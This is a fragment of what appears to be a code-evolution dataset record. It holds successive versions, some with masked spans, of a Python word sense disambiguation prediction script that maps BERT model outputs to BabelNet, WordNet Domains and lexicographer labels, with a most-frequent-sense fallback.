to_return.append(results)\n del vocab_label_lex\n del vocab_label_wndmn\n del vocab_label_bn\n return to_return, sentences_xml_elements\n\n\ndef __write_result(filename: str, frase, resources_path: str, outputh_path:\n str, predictions, vocab=None, enable_coarse_grained: int=1,\n vocab_for_coarse=None) ->int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param output_path: the path of the output file (where you save your predictions)\n :param predictions: the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(\n list_of_possible_senses_first_step, bn2wn)\n candidates, list_of_possible_senses_bn_version = (\n create_custom_label(list_of_possible_senses_bn_version,\n parola.text, vocab, predictions[index],\n enable_coarse_grained=enable_coarse_grained))\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n mfs_counter += 1\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + '/' + filename, 'a') as test_saving:\n for tupla in to_write:\n test_saving.write(tupla[0] + ' ' + tupla[1] + '\\n')\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8\n ) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if \n wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=\n vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:\n Dict=None) ->str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else 'factotum'\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\n\ndef __type_checker(value: object) ->str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\n\ndef __decide_pos(pos: str) ->str:\n \"\"\"\n Decides the WN representation of the given pos in input\n :param pos: the pos to interpret with WordNet\n :return: the WN representation of the given pos\n \"\"\"\n to_return = None\n if pos == 'NOUN':\n to_return = 'n'\n if pos == 'VERB':\n to_return = 'v'\n if pos == 'ADJ':\n to_return = 'a'\n if pos == 'ADV':\n to_return = 'r'\n return to_return\n\n\ndef convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:\n \"\"\"\n Cast the given list (which contains only WN ids) to Babelnet IDs\n :param list_of_bn: the list to cast\n :param vocab: the vocabulary to use to perform the conversion\n :return: the converted list\n \"\"\"\n list_of_possible_senses_bn_version = []\n for candidate in list_of_bn:\n is_it_here = next(key for key, value in vocab.items() if candidate in\n value)\n if is_it_here:\n list_of_possible_senses_bn_version.append(is_it_here if type(\n is_it_here) == str else is_it_here[0])\n return list_of_possible_senses_bn_version\n\n\ndef create_custom_label(list_of_possible_senses: List, word: str, vocab:\n Dict, predictions, enable_coarse_grained: int=1) ->List:\n \"\"\"\n Converts the list of babelnet IDS to a number and outputs the converted list\n :param list_of_possible_senses: the list that contains all the babelnet's IDs\n :param word: the word for which we are predicting the sense in a specific moment\n :param vocab: the vocabulary Word -> Serial to exploit for the conversion\n :param predictions: the predictions made by the system\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values:\n 1 --> The flow will still be the same\n 2,3 -> Flow will change, triggering the first step for the coarse-grained approach.\n :return: a List with the IDs converted\n \"\"\"\n to_return = []\n list_of_indices_to_delete = []\n for indice in range(len(list_of_possible_senses)):\n new_string = word + '_' + list_of_possible_senses[indice\n ] if enable_coarse_grained == 1 else list_of_possible_senses[indice\n ]\n conversion = None\n try:\n conversion = int(vocab[new_string])\n to_return.append(predictions[conversion])\n except:\n list_of_indices_to_delete.append(indice)\n continue\n if list_of_indices_to_delete:\n list_of_possible_senses = [list_of_possible_senses[prov_index] for\n prov_index in range(len(list_of_possible_senses)) if prov_index\n not in list_of_indices_to_delete]\n return to_return, list_of_possible_senses\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef predict_babelnet(input_path: str, output_path: str, resources_path: str\n ) ->None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print('>>>> BABELNET PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'babelnet.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 0][0], vocab=vocab_label_bn, enable_coarse_grained=1,\n vocab_for_coarse=None)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path: str, output_path: str,\n resources_path: str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> WORDNET DOMAINS PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3] + 'wndomains.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path: str, output_path: str, resources_path:\n str) ->None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print('>>>> LEXICOGRAPHER PREDICTION')\n prediction_results, sentences_xml_elements = __predict(input_path,\n resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + 'lexicon.gold.key.txt'\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename, sentences_xml_elements[\n index], resources_path, output_path, prediction_results[index][\n 2][0], vocab=vocab_label_lex, enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n print('Successfully saved {} out of {}'.format(correctly_saved, len(\n prediction_results)))\n del prediction_results\n print('Of these, {} were MFS'.format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef __predict(input_path: str, resources_path: str) ->Tuple:\n \"\"\"\n Actually predicts a sentence and returns the predictions in the requested formats\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: The actual prediction by the network\n \"\"\"\n train, etree_data = load_dataset(input_path)\n train = [dato for dato in train if dato]\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n modello = WSD(resources_path + '/vocabularies/bert_vocab.txt', [len(\n vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)],\n dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)\n tokenizatore = modello.tokenizatore\n modello.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5'\n )\n to_return = []\n sentences_xml_elements = etree_data.xpath('/*/*/*')\n for sentence in train:\n feature_1, feature_2, feature_3 = (\n convert_sentence_to_features_no_padding(sentence, tokenizatore))\n results = modello.model.predict({'input_word_ids': feature_1,\n 'input_mask': feature_2, 'segment_ids': feature_3}, verbose=1)\n to_return.append(results)\n del vocab_label_lex\n del vocab_label_wndmn\n del vocab_label_bn\n return to_return, sentences_xml_elements\n\n\ndef __write_result(filename: str, frase, resources_path: str, outputh_path:\n str, predictions, vocab=None, enable_coarse_grained: int=1,\n vocab_for_coarse=None) ->int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param output_path: the path of the output file (where you save your predictions)\n :param predictions: the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(\n list_of_possible_senses_first_step, bn2wn)\n candidates, list_of_possible_senses_bn_version = (\n create_custom_label(list_of_possible_senses_bn_version,\n parola.text, vocab, predictions[index],\n enable_coarse_grained=enable_coarse_grained))\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n mfs_counter += 1\n the_actual_meaning = MFS(parola, bn2wn, vocab2=\n vocab_for_coarse, pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + '/' + filename, 'a') as test_saving:\n for tupla in to_write:\n test_saving.write(tupla[0] + ' ' + tupla[1] + '\\n')\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8\n ) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if \n wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=\n vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:\n Dict=None) ->str:\n \"\"\"\n Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction\n :param value: The Value from which to extrapolate the actual meaning found\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab: The vocab in support of mode 2 or 3.\n :return: the actual meaning found with MFS\n \"\"\"\n the_meaning_to_explot = __type_checker(value)\n if pred_case == 1:\n return the_meaning_to_explot\n if pred_case == 2:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0] if to_return else 'factotum'\n if pred_case == 3:\n to_return = vocab.get(the_meaning_to_explot)\n return to_return[0]\n\n\ndef __type_checker(value: object) ->str:\n \"\"\"\n Checks the type of the object and, accordingly, returns it\n :param value: the value to examinate\n :return: a string that is the value expected\n \"\"\"\n if type(value) == str:\n return value\n if type(value) == list:\n return value[0]\n\n\ndef __decide_pos(pos: str) ->str:\n \"\"\"\n Decides the WN representation of the given pos in input\n :param pos: the pos to interpret with WordNet\n :return: the WN representation of the given pos\n \"\"\"\n to_return = None\n if pos == 'NOUN':\n to_return = 'n'\n if pos == 'VERB':\n to_return = 'v'\n if pos == 'ADJ':\n to_return = 'a'\n if pos == 'ADV':\n to_return = 'r'\n return to_return\n\n\ndef convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:\n \"\"\"\n Cast the given list (which contains only WN ids) to Babelnet IDs\n :param list_of_bn: the list to cast\n :param vocab: the vocabulary to use to perform the conversion\n :return: the converted list\n \"\"\"\n list_of_possible_senses_bn_version = []\n for candidate in list_of_bn:\n is_it_here = next(key for key, value in vocab.items() if candidate in\n value)\n if is_it_here:\n list_of_possible_senses_bn_version.append(is_it_here if type(\n is_it_here) == str else is_it_here[0])\n return list_of_possible_senses_bn_version\n\n\ndef create_custom_label(list_of_possible_senses: List, word: str, vocab:\n Dict, predictions, enable_coarse_grained: int=1) ->List:\n \"\"\"\n Converts the list of babelnet IDS to a number and outputs the converted list\n :param list_of_possible_senses: the list that contains all the babelnet's IDs\n :param word: the word for which we are predicting the sense in a specific moment\n :param vocab: the vocabulary Word -> Serial to exploit for the conversion\n :param predictions: the predictions made by the system\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to None. Possible values:\n 1 --> The flow will still be the same\n 2,3 -> Flow will change, triggering the first step for the coarse-grained approach.\n :return: a List with the IDs converted\n \"\"\"\n to_return = []\n list_of_indices_to_delete = []\n for indice in range(len(list_of_possible_senses)):\n new_string = word + '_' + list_of_possible_senses[indice\n ] if enable_coarse_grained == 1 else list_of_possible_senses[indice\n ]\n conversion = None\n try:\n conversion = int(vocab[new_string])\n to_return.append(predictions[conversion])\n except:\n list_of_indices_to_delete.append(indice)\n continue\n if list_of_indices_to_delete:\n list_of_possible_senses = [list_of_possible_senses[prov_index] for\n prov_index in range(len(list_of_possible_senses)) if prov_index\n not in list_of_indices_to_delete]\n return to_return, list_of_possible_senses\n\n\nif __name__ == '__main__':\n predict_babelnet(\n '/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/dataset/test/senseval3.data.xml'\n , '../output',\n '/Users/gimmi/Desktop/Università/MAGISTRALE/NLP/nlp-finalproject/resources'\n )\n",
"step-5": "from model import WSD\nfrom data_preprocessing import load_dataset, create_mapping_dictionary, reload_word_mapping,get_bn2wn,get_bn2wndomains, get_bn2lex\nfrom typing import List, Dict, Tuple\nfrom prova import convert_sentence_to_features_no_padding\nimport numpy as np\nimport os\nfrom nltk.corpus import wordnet\n\n\nmfs_counter = 0\n\n\ndef predict_babelnet(input_path : str, output_path : str, resources_path : str) -> None:\n global mfs_counter\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <BABELSynset>\" format (e.g. \"d000.s000.t000 bn:01234567n\").\n \n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n \n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n print(\">>>> BABELNET PREDICTION\")\n prediction_results, sentences_xml_elements = __predict(input_path,resources_path)\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3]+\"babelnet.gold.key.txt\"\n for index in range(len(prediction_results)):\n\n correctly_saved += __write_result(filename,\n sentences_xml_elements[index],\n resources_path, output_path,\n prediction_results[index][0][0],\n vocab=vocab_label_bn,\n enable_coarse_grained=1,\n vocab_for_coarse=None)\n\n print(\"Successfully saved {} out of {}\".format(correctly_saved, len(prediction_results)))\n del prediction_results\n print(\"Of these, {} were MFS\".format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_wordnet_domains(input_path : str, output_path : str, resources_path : str) -> None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <wordnetDomain>\" format (e.g. \"d000.s000.t000 sport\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print(\">>>> WORDNET DOMAINS PREDICTION\")\n prediction_results, sentences_xml_elements = __predict(input_path,resources_path)\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n correctly_saved = 0\n bn2wndom = get_bn2wndomains()\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n filename = filename[:-3]+\"wndomains.gold.key.txt\"\n for index in range(len(prediction_results)):\n\n correctly_saved += __write_result(filename,\n sentences_xml_elements[index],\n resources_path, output_path,\n prediction_results[index][1][0],\n vocab=vocab_label_wndmn,\n enable_coarse_grained=2,\n vocab_for_coarse=bn2wndom)\n\n print(\"Successfully saved {} out of {}\".format(correctly_saved, len(prediction_results)))\n del prediction_results\n print(\"Of these, {} were MFS\".format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef predict_lexicographer(input_path : str, output_path : str, resources_path : str) -> None:\n \"\"\"\n DO NOT MODIFY THE SIGNATURE!\n This is the skeleton of the prediction function.\n The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)\n with your predictions in the \"<id> <lexicographerId>\" format (e.g. \"d000.s000.t000 noun.animal\").\n\n The resources folder should contain everything you need to make the predictions. It is the \"resources\" folder in your submission.\n\n N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.\n If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding\n\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: None\n \"\"\"\n global mfs_counter\n print(\">>>> LEXICOGRAPHER PREDICTION\")\n prediction_results, sentences_xml_elements = __predict(input_path, resources_path)\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n correctly_saved = 0\n filename = os.path.normpath(input_path)\n filename = filename.split(os.sep)[-1]\n bn2lex = get_bn2lex()\n filename = filename[:-3] + \"lexicon.gold.key.txt\"\n for index in range(len(prediction_results)):\n correctly_saved += __write_result(filename,\n sentences_xml_elements[index],\n resources_path,output_path,\n prediction_results[index][2][0],\n vocab= vocab_label_lex,\n enable_coarse_grained=3,\n vocab_for_coarse=bn2lex)\n\n print(\"Successfully saved {} out of {}\".format(correctly_saved, len(prediction_results)))\n del prediction_results\n print(\"Of these, {} were MFS\".format(mfs_counter))\n mfs_counter = 0\n return\n\n\ndef __predict(input_path : str, resources_path : str) -> Tuple:\n \"\"\"\n Actually predicts a sentence and returns the predictions in the requested formats\n :param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).\n :param output_path: the path of the output file (where you save your predictions)\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :return: The actual prediction by the network\n \"\"\"\n train, etree_data = load_dataset(input_path)\n train = [dato for dato in train if dato]\n vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')\n vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')\n vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')\n modello = WSD(resources_path+\"/vocabularies/bert_vocab.txt\", [len(vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)], dropout=0.1, recurrent_dropout=0.1,learning_rate=0.0003)\n tokenizatore = modello.tokenizatore\n modello.model.load_weights(resources_path+\"/saved_model/model_20_2.14.h5\")\n to_return = []\n sentences_xml_elements = etree_data.xpath(\"/*/*/*\")\n for sentence in train:\n feature_1, feature_2, feature_3 = convert_sentence_to_features_no_padding(sentence,tokenizatore)\n results = modello.model.predict(\n {'input_word_ids': feature_1, 'input_mask': feature_2, 'segment_ids': feature_3},\n verbose=1\n )\n to_return.append(results)\n del vocab_label_lex\n del vocab_label_wndmn\n del vocab_label_bn\n return to_return, sentences_xml_elements\n\n\ndef __write_result(filename: str,\n frase,\n resources_path: str,\n outputh_path: str,\n predictions,\n vocab = None,\n enable_coarse_grained: int = 1,\n vocab_for_coarse = None) -> int:\n \"\"\"\n Write results in the file system\n :param filename: the name of the file to save\n :param frase: the object from which recover the sentence\n :param resources_path: the path of the resources folder containing your model and stuff you might need.\n :param output_path: the path of the output file (where you save your predictions)\n :param predictions: the predictions made by the system\n :param vocab: the vocab needed for giving a sense\n :param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :param vocab_for_coarse: The vocab in support of mode 2 or 3\n :return: 1 if succeeds\n \"\"\"\n global mfs_counter\n bn2wn = get_bn2wn()\n lemma2wn = reload_word_mapping(resources_path+\"/mapping/lemma2wn.txt\")\n to_write = []\n for index, parola in enumerate(frase):\n name = parola.xpath('name()')\n if name == 'instance':\n id = parola.get('id')\n list_of_possible_senses_first_step = lemma2wn.get(parola.text)\n if not list_of_possible_senses_first_step:\n # MFS\n the_actual_meaning = MFS(parola,\n bn2wn,\n vocab2=vocab_for_coarse,\n pred_case=enable_coarse_grained)\n mfs_counter += 1\n to_write.append((id, the_actual_meaning))\n continue\n list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(list_of_possible_senses_first_step, bn2wn)\n\n candidates,list_of_possible_senses_bn_version = create_custom_label(list_of_possible_senses_bn_version,\n parola.text,\n vocab,\n predictions[index],\n enable_coarse_grained=enable_coarse_grained)\n the_actual_meaning = None\n if candidates:\n argmax = np.argmax(candidates)\n the_actual_meaning = list_of_possible_senses_bn_version[argmax]\n else:\n #MFS\n mfs_counter += 1\n the_actual_meaning = MFS(parola,\n bn2wn,\n vocab2=vocab_for_coarse,\n pred_case=enable_coarse_grained)\n to_write.append((id, the_actual_meaning))\n with open(outputh_path + \"/\"+filename, \"a\") as test_saving:\n for tupla in to_write:\n test_saving.write(tupla[0] + \" \" + tupla[1]+\"\\n\")\n del to_write\n del lemma2wn\n del bn2wn\n return 1\n\n\ndef MFS(parola, vocab: Dict, vocab2:Dict = None, pred_case: int = 1) -> str:\n \"\"\"\n Returns the sense by applying the Most Frequent Sense (MFS) strategy\n :param parola: the Element object to which associate a sense\n :param vocab: the vocab needed for giving a sense\n :param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained\n :param pred_case: whether to adopt a \"rollback\" strategy such as MFS or not. Possible values:\n 1 --> Means I'm predicting with Babelnet. No extra precautions needed\n 2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class \"factotum\" is returned instead\n 3 --> Means I'm predicting with Lexicon. Need to consult the vocab.\n :return: the chosen sense with the MFS technique\n \"\"\"\n pos = parola.get('pos')\n pos_input = __decide_pos(pos)\n wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)\n try:\n wordnet_object = wordnet_object[0]\n except:\n print(wordnet_object)\n print(parola.text)\n wn_synset = \"wn:\" + str(wordnet_object.offset()).zfill(8) + wordnet_object.pos()\n the_actual_meaning = next(key for key, value in vocab.items() if wn_synset in value)\n to_return = __extrapolate_value_for_MFS(the_actual_meaning,vocab=vocab2, pred_case=pred_case)\n return to_return\n\n\ndef __extrapolate_value_for_MFS(value: object, 